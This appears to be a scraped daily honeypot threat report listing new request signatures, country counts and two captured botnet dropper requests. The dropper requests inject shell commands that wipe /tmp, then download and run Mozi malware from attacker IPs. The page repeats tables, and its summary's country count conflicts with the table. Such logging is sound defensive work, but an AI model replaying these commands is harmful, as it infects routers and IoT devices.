Table of Contents

Daily Report: 2025-06-27
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 11 new requests that have never been observed before (these were added to the monitored request database.).

A total of 897 requests were recorded during the day, originating from 2 different countries, with a peak of 354 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
CN	Georgia

botnet_dropper_behaviour
#

remote_addr	request
45.230.66.107	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.230.66.107:10786/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
219.68.210.56	GET /shell?cd+/tmp;rm+-rf+*;wget+http://219.68.210.56:39295/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
7	12	GET /xyzz.xyzz HTTP/1.1
8	11	SSH-2.0-libssh_0.11.1
123	1	POST /getpage.gch?pid=101 HTTP/1.1
201	1	\x04\x01\x00P\xC4\xFBF\xEA\x00
202	1	CONNECT 196.251.70.234:80 HTTP/1.0
231	1	GET /odinhttpcall1750985145 HTTP/1.1
232	1	GET /OdinHttpCall1750985145 HTTP/1.1
233	1	GET /Odin/http/call1750985145 HTTP/1.1
249	1	GET /odinhttpcall1750993162 HTTP/1.1
250	1	GET /OdinHttpCall1750993162 HTTP/1.1
251	1	GET /Odin/http/call1750993162 HTTP/1.1

country_iso_code
#

	number_of_occurence	country_iso_code
0	354	US
1	62	DE
2	57	GB
3	50	HK
4	49	BG
5	48	TW
6	40	NL
7	35	JP
8	28	CA
9	27	SG
10	16	FR
11	16	GH
12	13	ZA
13	12	PL
14	10	DO
15	10	CN
16	9	TR
17	6	CH
18	6	IL
19	5	BR
20	4	SC
21	4	IN
22	4	UA
23	3	MC
24	3	AR
25	3	KZ
26	3	BE
27	3	VN
28	2	PT
29	2	RU
30	2	IE
31	2	RO
32	1	ES
33	1	BD
34	1	KR
35	1	ID
36	1	SE
37	1	MD
38	1	TH
39	1	IT
40	1	AO

Report: 2025-06-26

26 June 2025·457 words

Repport Daily

Report: 2025-06-25

25 June 2025·318 words

Repport Daily

Report: 2025-06-24

24 June 2025·327 words

Repport Daily

	number_of_occurence	country_iso_code
0	354	US
1	62	DE
2	57	GB
3	50	HK
4	49	BG
5	48	TW
6	40	NL
7	35	JP
8	28	CA
9	27	SG
10	16	FR
11	16	GH
12	13	ZA
13	12	PL
14	10	DO
15	10	CN
16	9	TR
17	6	CH
18	6	IL
19	5	BR
20	4	SC
21	4	IN
22	4	UA
23	3	MC
24	3	AR
25	3	KZ
26	3	BE
27	3	VN
28	2	PT
29	2	RU
30	2	IE
31	2	RO
32	1	ES
33	1	BD
34	1	KR
35	1	ID
36	1	SE
37	1	MD
38	1	TH
39	1	IT
40	1	AO

	number_of_occurence	country_iso_code
0	354	US
1	62	DE
2	57	GB
3	50	HK
4	49	BG
5	48	TW
6	40	NL
7	35	JP
8	28	CA
9	27	SG
10	16	FR
11	16	GH
12	13	ZA
13	12	PL
14	10	DO
15	10	CN
16	9	TR
17	6	CH
18	6	IL
19	5	BR
20	4	SC
21	4	IN
22	4	UA
23	3	MC
24	3	AR
25	3	KZ
26	3	BE
27	3	VN
28	2	PT
29	2	RU
30	2	IE
31	2	RO
32	1	ES
33	1	BD
34	1	KR
35	1	ID
36	1	SE
37	1	MD
38	1	TH
39	1	IT
40	1	AO

Daily Report: 2025-06-27#

Executive summary#

executive_summary#

ot_simplified_report#

botnet_dropper_behaviour#

request#

country_iso_code#

Related

Daily Report: 2025-06-27
#

Executive summary
#

executive_summary
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	354	US
1	62	DE
2	57	GB
3	50	HK
4	49	BG
5	48	TW
6	40	NL
7	35	JP
8	28	CA
9	27	SG
10	16	FR
11	16	GH
12	13	ZA
13	12	PL
14	10	DO
15	10	CN
16	9	TR
17	6	CH
18	6	IL
19	5	BR
20	4	SC
21	4	IN
22	4	UA
23	3	MC
24	3	AR
25	3	KZ
26	3	BE
27	3	VN
28	2	PT
29	2	RU
30	2	IE
31	2	RO
32	1	ES
33	1	BD
34	1	KR
35	1	ID
36	1	SE
37	1	MD
38	1	TH
39	1	IT
40	1	AO